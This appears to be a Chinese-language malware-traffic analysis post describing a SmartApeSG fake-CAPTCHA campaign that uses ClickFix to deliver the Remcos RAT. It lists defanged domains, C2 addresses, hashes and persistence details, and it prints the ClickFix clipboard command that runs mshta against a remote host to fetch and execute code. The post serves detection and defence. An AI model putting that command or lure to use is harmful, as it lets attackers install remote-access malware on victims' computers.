Malware-Traffic-Analysis.net - 2026-01-06: SmartApeSG验证码页面利用ClickFix技术投递Remcos RAT

2026-01-06（星期二）：SMARTAPESG验证码页面利用CLICKFIX技术投递REMCOS RAT

注意：

压缩文件受密码保护。值得注意的是，本网站采用了新的密码方案。密码请参见本网站的“关于”页面。

关联文件：

• 2026-01-06-IOCs-for-SmartApeSG-ClickFix-to-Remcos-RAT.txt.zip - 1.2 kB (1,224 字节)
• 2026-01-06-SmartApeSG-ClickFix-for-Remcos-RAT.pcap.zip - 56.9 MB (56,932,975 字节)
• 2026-01-06-SmartApeSG-files.zip - 41.1 MB (41,083,107 字节)

2026-01-06（星期二）：SMARTAPESG验证码页面利用CLICKFIX技术投递REMCOS RAT

合法但被入侵的网站：

• [信息已移除]

注入的SMARTAPESG脚本：

• hxxps[:]//dinozozo[.]com/menu.js

指向SMARTAPESG虚假验证码页面的流量：

• hxxps[:]//pippyheydguide[.]com/redirect/profile-script.js
• hxxps[:]//pippyheydguide[.]com/redirect/middleware-service.php?gvefGY13
• hxxps[:]//pippyheydguide[.]com/redirect/middleware-effect.js?2718cdb882b4f057aa

注入剪贴板的CLICKFIX脚本：

1

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta hxxp[:]//193.111.208[.]238/auth"

由CLICKFIX脚本生成的流量：

• hxxp[:]//193.111.208[.]238/auth [301 永久移动]
• hxxps[:]//lpiaretes[.]com/auth
• hxxp[:]//193.111.208[.]238/byte [301 永久移动]
• hxxps[:]//lpiaretes[.]com/byte

下载的REMCOS RAT程序包：

• SHA256哈希值： bcf13c1e79ebffba07dcc635c05a5d2f826fe75b4e69f7541b6ce6af4a5e31c0
• 文件大小： 41,523,044 字节
• 文件类型： Zip压缩文件，至少需要v2.0版本解压，压缩方法=deflate
• 获取来源： hxxps[:]//lpiaretes[.]com/byte
• 文件保存位置示例： C:\Users[用户名]\AppData\Local\230061.pdf
• 注意： 保存路径中使用的6位数字对于每次感染是唯一的。

REMCOS RAT特征：

• 感染后通过HTTPS向C2服务器 192.144.56.80:443 发起通信（使用自签名证书）。
• Remcos RAT程序包通过一个合法的EXE文件利用DLL侧加载技术。
• 通过计划任务和Windows注册表更新两种方式建立持久化：
  • 任务和注册表项名称： Intel PLLQ Components
  • 命令： C:\Users[用户名]\AppData\Local\230061\mega_altpllq.exe

图片说明 上图：显示SmartApeSG虚假验证码页面的合法但被入侵网站示例。 上图：感染过程中产生的HTTPS URL。 上图：在Wireshark中过滤出的感染流量。 上图：Remcos RAT在受感染的Windows主机上建立的持久化机制。

单击此处返回主页。

版权所有 © 2026 | Malware-Traffic-Analysis.net